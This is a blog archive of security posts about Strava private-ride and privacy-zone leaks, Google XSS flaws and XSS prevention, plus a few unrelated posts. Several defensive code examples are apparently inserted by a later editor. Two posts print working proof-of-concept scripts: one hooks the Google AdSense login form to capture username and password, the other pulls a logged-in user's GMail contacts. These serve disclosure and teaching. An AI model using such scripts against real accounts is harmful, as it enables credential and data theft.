Archive for the 'Security' Category

Strava “API” and privacy leaks.

Monday, July 8th, 2013

I previously had some pages which used the Strava API to do useful things for me. The one I used most was seeing who rode climbs together: it simply used the API to see everyone who rode a segment and then tracked their start times so you could see who was riding with whom. It was also really useful to see changes in time between groups in a race, i.e. the break started a lap 2 minutes ahead and then the next lap only 1 minute.

Strava killed their previous API though, and despite an initial promise from them for me to have access to their new API if I agreed to remove their embarrassing GPX export service which revealed the private zones of people’s rides, I never got access, they just stopped emailing. (The privacy flaw was in their export, not in anything I did…).

I’m stuck here now without access to the useful features, so I’ve started looking for a replacement. I don’t have access to their new APIs, and in fact I don’t think I’d bother investing the time in them anyway, once bitten… But I started looking at the services they use to populate the pages themselves. An immediate thing hits me, their page API allows access to private activities.

Accessing private activities

Here’s a private run of mine, you won’t be able to see it, however here’s a JSON file of the exact run. So as long as you know the ID of a user’s ride, you can get all the info about it. It also completely ignores the privacy zones you have configured when exporting a private ride. Here is a public version of the same run as the last one; this has a privacy zone (it’s only hiding a sports club which is the start for these races, it’s not my house!) and you can see from exporting this one that the points within the privacy zone are reset to 0,0 rather than the actual lat/lon. Yet on the fully private activity, those same points were available: private activities actually carry more risk of revealing your location than public ones.

Private rides are just security through obscurity, and the IDs aren’t even that obscure, so don’t give Strava data that you actually want private.

Distances within privacy zones are provided

Another privacy flaw here is that while the lat/lons on public rides in your privacy zone are hidden, the distances you travel for each of those points in the private zone are not, so it’s a pretty easy algorithm to get back to very close to the start of your ride/run unless you do some laps inside your zone or something similar to obfuscate it. Altitude is also provided for the points within the zone, so that may reveal more for those of you who don’t live in flat lands.
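To show what an export filter has to strip for a privacy zone to mean anything, here is an added example (my own code, not Strava’s, and not from the original post). It contrasts an export that mirrors the behaviour described above, lat/lon reset to 0,0 but per-point distance and altitude still emitted, with one that drops in-zone points entirely and rebases the cumulative distance so nothing about the hidden stretch is disclosed. The zone centre, radius and track points are constructed sample data.

```javascript
// Added example (not Strava's code): privacy-zone export filtering.
// A point is {lat, lon, distance (cumulative metres), altitude (metres)}.

// Great-circle distance in metres between two lat/lon pairs (haversine).
function haversineMetres(lat1, lon1, lat2, lon2) {
  const R = 6371000;
  const toRad = (d) => (d * Math.PI) / 180;
  const dLat = toRad(lat2 - lat1);
  const dLon = toRad(lon2 - lon1);
  const a = Math.sin(dLat / 2) ** 2 +
    Math.cos(toRad(lat1)) * Math.cos(toRad(lat2)) * Math.sin(dLon / 2) ** 2;
  return 2 * R * Math.asin(Math.sqrt(a));
}

function inZone(pt, zone) {
  return haversineMetres(pt.lat, pt.lon, zone.lat, zone.lon) <= zone.radiusM;
}

// Weak export: hides coordinates only. The number of hidden points, the
// distance covered inside the zone and the altitude profile are all kept.
function weakExport(points, zone) {
  return points.map((p) => (inZone(p, zone)
    ? { lat: 0, lon: 0, distance: p.distance, altitude: p.altitude }
    : { ...p }));
}

// Hardened export: in-zone points are removed outright, and the cumulative
// distance is rebased so the first visible point reads 0. A consumer can no
// longer walk back from the first visible point to the true start.
function hardenedExport(points, zone) {
  const visible = points.filter((p) => !inZone(p, zone));
  if (visible.length === 0) return [];
  const base = visible[0].distance;
  return visible.map((p) => ({
    lat: p.lat, lon: p.lon, distance: p.distance - base, altitude: p.altitude,
  }));
}

// Check an exported track the way a reviewer would: any 0,0 placeholder
// point, or a first point whose distance is not 0, means the zone leaks.
function exportLeaksZone(exported) {
  if (exported.length === 0) return false;
  if (exported.some((p) => p.lat === 0 && p.lon === 0)) return true;
  return exported[0].distance !== 0;
}

// Constructed sample: a 500 m zone around the start, four points heading
// due north at 0.001 degree (~111 m) and then 0.005 degree (~556 m) steps.
const ZONE = { lat: 51.5, lon: -0.1, radiusM: 500 };
const SAMPLE_POINTS = [
  { lat: 51.500, lon: -0.1, distance: 0, altitude: 20 },
  { lat: 51.501, lon: -0.1, distance: 111, altitude: 22 },
  { lat: 51.505, lon: -0.1, distance: 556, altitude: 25 },
  { lat: 51.510, lon: -0.1, distance: 1112, altitude: 30 },
];

console.log('weak leaks zone:', exportLeaksZone(weakExport(SAMPLE_POINTS, ZONE)));
console.log('hardened:', JSON.stringify(hardenedExport(SAMPLE_POINTS, ZONE)));
```

The rebasing step is the important one: zeroing coordinates while leaving cumulative distance in place is exactly the residual leak the post describes, and the checker flags it without needing to know the zone.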

Strava Lack of time?

Strava have repeatedly said their reason for not supporting old APIs or for not providing access to the new API is lack of time. I guess I can now believe this, as they don’t even appear to have the time to invest in basic honouring of their privacy assurances. I did try emailing them before publishing this, and then tried twitter, but still no response.

The pub worker theft device

Thursday, August 17th, 2006

As a homeless internet developer, I spend a lot of my time in pubs using their wifi and drinking their beer. Drinking beer has a side-effect, and not just on my code quality: my bladder fills and I need to partake of the facilities. This means abandoning the laptop on the table of a strange pub in a strange town - the data’s safe, that’s encrypted - not for me the embarrassment of losing a laptop chock full of an unsecured source tree, but the machine is worth a fair bit, and it’d be bloody annoying too.

So I was thinking - T60’s and indeed all decent laptops already have an accelerometer in them, so why isn’t there a program which starts shrieking “Help, Help, he’s stealing me” at full volume? It would probably be really crap, but it should at least exist - people?

Of course if you do see a strange bloke sitting in a corner drinking alone yet talking to himself and imaginary people on IRC, go buy him a drink - it might be me.

Don’t serve JSON as text/html

Wednesday, July 5th, 2006

Another day, another XSS flaw, this one in Google again, but this is a little more interesting than the normal ones, what this one shows is how JSON results add an extra vector to attack that might be missed by your QA team.

The problem here was that the JSON was returned with a mime-type of text/html; a browser will render that as if it was an HTML page, even if it’s really just a javascript snippet. The easiest way to protect against these is to ensure that all javascript received by the XMLHttpRequest object is returned with a suitable mime-type - application/json. That will mean that even when you make a mistake and write un-encoded untrusted data to the document, it won’t allow people to attack your site.
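Here is an added example of the two ways of labelling the same JSON response; it is my own code, not Google’s and not from the original post. The weak form types the body as text/html, which a browser will happily parse and run as a page; the hardened form types it as application/json and, as a second line of defence, replaces `<`, `>` and `&` inside the serialised JSON with their `\uXXXX` escapes so that the text stays valid JSON but contains no characters that could open a tag if it were ever written into a document unencoded. The `X-Content-Type-Options: nosniff` header is a later addition to browsers that postdates the post; the search term used as input is constructed.

```javascript
// Added example (not the post's or Google's code): typing a JSON response.

// Weak: JSON labelled as HTML. If the body contains "<script>", a browser
// navigated to this URL will execute it.
function weakJsonResponse(data) {
  return {
    status: 200,
    headers: { 'Content-Type': 'text/html' },
    body: JSON.stringify(data),
  };
}

// Replace HTML-significant characters (and the two line separators that
// break inline script) with JSON unicode escapes. The output is still valid
// JSON and JSON.parse() gives back the original strings unchanged.
function escapeJsonForHtml(json) {
  return json.replace(/[<>&\u2028\u2029]/g, (c) =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Hardened: correct media type, nosniff so the declared type is honoured,
// and no raw angle brackets or ampersands in the body at all.
function safeJsonResponse(data) {
  return {
    status: 200,
    headers: {
      'Content-Type': 'application/json; charset=utf-8',
      'X-Content-Type-Options': 'nosniff', // assumption: later than the post
    },
    body: escapeJsonForHtml(JSON.stringify(data)),
  };
}

// Review check for any response meant for XMLHttpRequest: a body that a
// browser would render as a page is the bug described above.
function isRenderableAsHtml(response) {
  const type = (response.headers['Content-Type'] || '').toLowerCase();
  return type.startsWith('text/html');
}

// Constructed untrusted input: a search term carrying a script tag.
const UNTRUSTED = { q: '<script>alert(1)</script>', results: [] };

console.log('weak renderable as HTML:', isRenderableAsHtml(weakJsonResponse(UNTRUSTED)));
console.log('safe body:', safeJsonResponse(UNTRUSTED).body);
```

The escaping is deliberately done on the serialised text rather than on the data, so the consumer still receives exactly what was stored; only the wire representation changes.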

The google exploit was reported here; at the time of writing it is unpatched. Unfortunately that was down to the discoverer not giving google any time to fix it; whilst they have had their problems before, recently they have patched quickly, so this was not very fair, or wise. Google also appear to be taking testing their own services for security flaws more seriously: they recently had a presentation to the QA team that you can watch on Google Video.

As I’ve said before, having everything on a single domain causes problems: it means any exploit anywhere on the domain allows you to exploit any service provided for the domain. This exploit is also present on https:// google, so to reinforce the problem XSS can present to a user, and why XSS is not simply about cookie stealing, here’s a simple demonstration of using the exploit to steal the username and password from google adsense.

The exploit is simply used to create an IFRAME that fills the document and points it to a google adsense login; when the user logs in, the username and password are alerted - also, after logging in, the “today’s earnings” are alerted. Of course a real attacker would not alert these fields, but would send them off to a site to be collected later. Are google adsense passwords useful? Would you notice if the address or account to get the cash changed until you’d not got the cheque?

The script code is simple, you don’t need to be clever, and phishers generally aren’t stupid, it takes brains to launder money.

// Replace the page body with a full-size iframe pointing at the AdSense
// login and hook the frame once it has loaded.
document.body.innerHTML="<div><iframe src='https://www.google.com/adsense/report/overview'"+
" onload='go()' style='position:absolute;top:0;left:0;height:100%;width:100%;'></iframe></div>";

function go() {
  try {
    // First load: the frame holds the login form, so attach to its submit.
    var win=window.frames[0];
    win.document.body.style.overflow="hidden";
    win.document.body.style.border="0px solid white";
    var doc=win.frames[0].document.forms[0];
    doc.onsubmit=function() {
      alert("Your adsense username and password are:\n"+
        doc["Email"].value+'\nand\n'+doc["Passwd"].value);
      var x=window.open(location.href);
    }
  } catch (e) {
    // Second load (after login): there is no form, so read the earnings
    // figure out of the page heading instead.
    try {
      var win=window.frames[0];
      var doc=win.document.body;
      var h1=doc.getElementsByTagName('h1')[0];
      alert("Today's Earnings:"+h1.getElementsByTagName('span')[0].innerHTML.replace(" ",""));
    } catch (e) {}
  }
}

The result is clear:

Google Flaw not fixed, GMail contact stealing demo

Monday, April 10th, 2006

Despite the flaw being announced a long time ago, the google Book search flaw is still broken. It’s surprising that Google aren’t taking it more seriously: this one is very easy to use to automate a user’s GMail account, stealing contacts, or sending email, if they are logged into google when they’re tricked into visiting such a page.

Here’s an example that will list your gmail contacts: List your gmail contacts

There’s no reason why a page cannot also send emails, steal the contents of emails or anything else. Given the length of time this has been public (I didn’t find this flaw, it was posted to bugtraq on the 4th April, or 6 days ago) it’s very possible that a worm that stole GMail information is already circulating. Disable script on google.com!

The script that gets the contacts is trivial:

function x() {
  // Synchronous same-origin request: the script runs on google.com, so the
  // browser attaches the victim's cookies and hands back the contacts page.
  var xmlhttp = new XMLHttpRequest();
  xmlhttp.open("GET","http://mail.google.com/mail/?view=page&name=contacts&ver=e0ad439ebad5ad16",false);
  xmlhttp.send('');
  return xmlhttp.responseText;
}

The x function then returns a JSON structure containing the contacts; this can easily be changed into the output format with some simple regular expressions: see test6.js for those and the complete included script. The Live HTTP Headers extension in Firefox is how to find out how to do other things.

Yet More Google Security Failures

Monday, April 10th, 2006

Google are still failing to keep even their flagship google.com domain secure from Cross Site Scripting attacks; in other words, it allows arbitrary code insertion into google.com.

See Google’s new pay search service (Not really of course, just my credit card form!)

The flaw appears to be in failing to clean the characters in a book result search. It’s a trivial flaw that every google employee should know about, and the same class of flaw keeps getting produced; Google developers and google testers would appear to be uninterested in security, not even bothering to test for flaws that they’ve found before.

How not to be an incompetent developer

Sunday, November 27th, 2005

In the last few entries I’ve called developers incompetent for their security flaws, and in the comments some people have thought this unfair of me. They rightly point out that security is not easy, so it wasn’t reasonable to call people who fail incompetent. I stand by my description though. Security is hard, but this type of security problem certainly isn’t; in fact it’s not just a security problem, it’s also a “the site doesn’t work” problem.

The fundamental cause of these problems is content being written into the page unencoded, so the character < is considered the start of an HTML element, rather than part of the content. Or, if the content is being written into an attribute, then the characters " or ' are considered to be the end of the attribute (or even a simple space if you don’t bother quoting your attributes). This lack of encoding isn’t just a security flaw though: the site simply won’t work properly, as any test data that includes these characters won’t appear correctly on the page. This is the main reason why I blame incompetence on the testers and developers, or simple laziness and not bothering to test at all.

Steps a developer can take

Here are 3 simple things I use as a developer to mitigate the risk.

  • Have < " in your toy test data, easy of course in your text input boxes, but also do it in your select values and radio values, that way you never need to actually test by directly entering a risky querystring, you can leave that to the tester, yet you’ll still catch the bug as you’re developing.
  • Place all non-html output variables into a single object, it doesn’t matter if the input comes from the user, or the database, it still needs to be encoded, okay a number should never need encoding, but there’s little lost to doing so anyway and you’ll reduce the risk from untrusted data. You can make this object only output encoded content, e.g. in javascript, you could use something like:
     function safeString(str) { this.value=str; }
     safeString.prototype.toString=function() { return htmlencode(this.value); }
     safe=new safeString("<script>alert(1)</script>");
     document.write(safe);

    Of course you can still make the mistake and not use your object, but it should be much easier to spot the bug early in the process.

  • This is mainly the testers job of course, but in an idle moment you should change the query string of any page to include a load of the bad characters, and just see if the page is happy, they should appear just like any other character does.
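The safeString object above leans on an htmlencode function that the post leaves undefined. Here is an added example, my own code rather than the post’s, that writes that function out, keeps the wrapper object, adds a tiny template renderer that refuses anything not wrapped (so a forgotten wrap fails loudly instead of silently), and uses the kind of toy test data with < and " in it that the first point recommends. The template syntax and the render function are assumptions for the sake of the example.

```javascript
// Added example (not the post's code): htmlencode, the SafeString wrapper,
// and a renderer that only accepts wrapped values.

// Encode the five characters that can change meaning in element content or
// in a quoted attribute value. Encoding both quote styles means the same
// output is safe in single- or double-quoted attributes.
function htmlencode(str) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(str).replace(/[&<>"']/g, (c) => map[c]);
}

// Wrapper whose string form is always the encoded value.
function SafeString(str) { this.value = str; }
SafeString.prototype.toString = function () { return htmlencode(this.value); };

// Minimal {name} template renderer (assumed syntax). Any variable that is not
// a SafeString is rejected, so an unencoded value cannot reach the page.
function render(template, vars) {
  return template.replace(/\{(\w+)\}/g, (_, name) => {
    const v = vars[name];
    if (!(v instanceof SafeString)) {
      throw new TypeError('unencoded value passed for ' + name);
    }
    return String(v);
  });
}

// Constructed toy test data carrying the risky characters, as the post
// suggests keeping in every input, select and radio value.
const TEST_DATA = { name: 'O\'Neil <b>"bold"</b> & co' };

console.log(render('<input value="{name}">', { name: new SafeString(TEST_DATA.name) }));
```

Because the renderer throws on a bare string, the "forgot to use the object" mistake the post mentions turns up on the first run against the toy data rather than after a tester feeds the page a hostile query string.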

These methods won’t stop all security problems, you’ll still need to think properly about security, but they at least make you a step above the current Google or Yahoo developer.

BBC Spam

Saturday, October 22nd, 2005

I got some BBC spam today, well actually not BBC spam, but Mentorn TV spam who are producing a TV show for the BBC, the spam is looking for people to appear on the show - it sounds like one of those crappy BBC 3 things.

The BBC say

Don’t reply, ever!
Never buy anything from a spammer. Don’t make spamming worth the effort - plus you’ll get even more spam once they know you’re willing to buy.

So I expect the BBC will be rather disappointed in the number of participants the show gets, and will presumably be ceasing all business with Mentorn TV, which would actually be a great shame as it produces a lot of quality shows, but really that just makes it worse that they’ve descended into sending spam.

The (current?) failure of local search

Tuesday, September 27th, 2005

There’s lots of talk, and lots of work in the search engine world about local search, I’m sure the reason is to get more advertisers - there’s only so many people who it’s relevant for to advertise globally, or even nationally, local shops for local people however would pay for local adverts.

I wanted to find a bike shop in Kingston, so I could find one that’s likely to have a tourer, as I’m thinking hard of cycling longer distances to get rid of the current fat belly (very old readers may remember me running 20:19 in the club handicap a few years back; 28:05 was my fat time this month).

One of the things I knew was there was an Evans cycles near the station, and there’s one just down the road from me in Surbiton - a few miles from Kingston. Google local was my first choice as they put it on the map, which is great. First there’s a search for Bike shop and Kingston. First up, google offers me 2 Kingstons to disambiguate - good, but I’ve searched for stuff in Kingston before; it really should remember which Kingston I’m near, at least give me the results for upon Thames, and give a link “did you mean Kingston upon Hull” if I’ve just asked 5 minutes ago.

Telling it Kingston upon Thames I get some results. The nearest result is Action Bikes - 3.8 miles away from Kingston in Richmond, the furthest is 13 miles away in Harrow or Lewisham - neither of the two bike shops I actually know about are listed at all - this is the big failure of local search - people know their local area, they know if there’s results missing, with a web search it doesn’t matter, I’ve no idea what resources the search engine hasn’t found, but with local search I know what’s missing and I’ll get annoyed.

Yahoo doesn’t have something called a local search, but it does have a business finder which does the same job. So bike shop in kingston returns no results at all, but a suggestion to try more general words, and bike in kingston turns up a big list mostly linked to motorbikes; however there’s one on the first page and it has a link to a category cycle shops, and clicking on that I get a list of 4 in Kingston, no way to enlarge the area though, and it doesn’t mention the ones just outside Kingston. It also took 4 pages and some thought about my search terms, much too much effort on a smartphone, and too much effort even in the office.

MSN search was just crazy: bike shop in kingston tells me that “kingston” was not recognized. Please be more specific. Changing kingston to anything from Kingston upon Thames to Surrey or London didn’t get me anywhere at all, I always got the same message - I couldn’t find any location that it actually worked for!

The providers of business information to google and yahoo are Yell and ThomsonLocal. Yell performed the search without any problems, both guiding me through the process of narrowing down what I wanted to cycle shops, and returning me a list in Kingston and a wider area. Thomson Local however fail to map bike shop to anything about bikes, somehow suggesting I might want shop fittings, if I deliberately choose cycle shops (what I’ve learnt they want them called) then it finds them no problem.

Local search appears to have a very long way to go, and will always suffer the problem of being different to what the local person knows of their locality - if you know the chip shop has closed, you’ll be annoyed if it appears on the map, if you know the best chip shop is on the high street and there’s nothing there on the search you’ll doubt all the results. I can’t see local search being a useful feature to me, they have a very long way to go, if you have to use one though, yahoo is the way to go, even though they still haven’t bothered with a background colour.

Fonts and Web Applications

Thursday, June 30th, 2005

In my Route planner toy, I use the airplane character from unicode () for the airports. I got a complaint today, that it looked crap because they only got a little square instead of a plane. Of course not all machines are going to have a font containing the plane character, so what are the options?

One option would be to use images instead, but this is slower to render and download, as well as a more complicated DOM to parse (and in an ideal world, you’d still need to think of how to make it accessible when images are disabled).

Instead I’ve decided to have a go at detecting if the font is actually supported, and if it is not, replace the plane symbol with a simple +. The code is pretty simple, and relies on the fact that symbols in fonts have different sizes, so it compares the size of 10 of the test symbol with 10 of a symbol from a private use area in unicode.

function symbolSupported(testChr) {
  var testDiv=document.createElement('div');
  testDiv.style.display="block";
  // Ten copies of a private use area character (U+F0000), which should have
  // no glyph in any font, next to ten copies of the symbol under test.
  testDiv.innerHTML="<span class=airport style='font-size:10em;'>&#983040;&#983040;"+
    "&#983040;&#983040;&#983040;&#983040;&#983040;&#983040;&#983040;&#983040;</span><"+
    "span class=airport style='font-size:10em;'>"+repeatStr("&#x"+testChr.toString(16)+";",10)+"</span>";
  document.body.appendChild(testDiv);
  // If the symbol is missing it renders as the same fallback box as the
  // private use character, so the two spans end up exactly the same size.
  var supported=!(testDiv.firstChild.offsetWidth*testDiv.firstChild.offsetHeight ==
    testDiv.lastChild.offsetWidth*testDiv.lastChild.offsetHeight);
  document.body.removeChild(testDiv);
  return supported;
}

function repeatStr(str,n) {
  var out=[];
  for (var i=0;i<n;i++) {
    out.push(str);
  }
  return out.join("");
}

This seems to work pretty well where I’ve tested it, but I’m not that happy with it - is it safe to assume that the private use area is empty? Is it safe to assume that the size, even with 10 characters at 100em, is different between the symbols? Still, for this use case it’s relatively safe, as the alternative of +’s would be acceptable to anyone, but for more complicated symbols and use cases I don’t think it would be safe.

Does anyone have a better approach that would work here?

Addictive Fast Food

Saturday, January 1st, 2005

An Interesting Economist Article